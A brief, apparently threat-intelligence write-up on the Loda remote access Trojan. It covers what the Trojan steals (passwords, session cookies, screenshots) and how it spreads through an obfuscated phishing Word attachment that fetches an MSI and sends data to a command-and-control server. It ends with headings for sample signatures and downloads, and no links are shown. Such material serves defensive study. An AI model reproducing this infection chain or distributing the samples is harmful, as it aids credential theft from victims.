Loda RAT, first detected in 2017 which now slowly matures up into an effective remote access Trojan, yet simple. It steal username/passwords, session cookies and can take screenshots too. Its current version in wild is 1.1.1. Infection process is simple, it started with a phishing e-mail with Microsoft Word document as attachment.
The document is obfuscated which hide it from AV detection. Once the document is opened a MSI file is downloaded and executed which smuggle data from victim machine to it Command and Control server.
Loda RAT Document Signatures
Loda RAT Document Download
Loda RAT MSI Signatures
Loda RAT MSI Download